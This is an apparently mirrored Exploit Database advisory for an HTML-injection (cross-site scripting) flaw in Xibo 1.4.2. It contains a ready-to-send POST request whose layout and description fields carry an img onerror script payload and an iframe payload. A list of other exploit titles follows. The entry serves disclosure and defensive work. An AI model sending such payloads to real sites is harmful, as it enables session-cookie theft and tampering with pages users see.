Xibo – ‘layout’ HTML Injection

Exploit Database
15 阅读

作者： Jacob Holcomb

日期： 2013-08-21
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/38745/

source: https://www.securityfocus.com/bid/62063/info

Xibo is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code could be executed in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user; other attacks are also possible.

Xibo 1.4.2 is vulnerable; other versions may also be affected. 

POST: /index.php?p=layout&q=add&ajax=true

Data: layoutid=0&layout=Gimppy%3Cimg+src%3D42+onerror%3D'alert(%22InfoSec42%22)'%3E&description=%3Ciframe+src%3D'http%3A%2F%2Fsecurityevaluators.com'+width%3D1000+height%3D1000%3C%2Fiframe%3E&tags=&templateid=0

last Exploits
Xibo – ‘layout’ HTML Injection的更多信息

QuickEStore 6.1 – Backup Dump：
SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal：
Alienvault Open Source SIEM (OSSIM) 4.3 – Cross-Site Request Forgery：
elproLOG MONITOR Webaccess 2.1 – Multiple Vulnerabilities：
DomainMOD 4.11.01 – ‘raid’ Cross-Site Scripting：
Joomla! Component com_mtree 2.1.5 – Arbitrary File Upload：
RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting：
Real-time ASP Calendar – SQL Injection：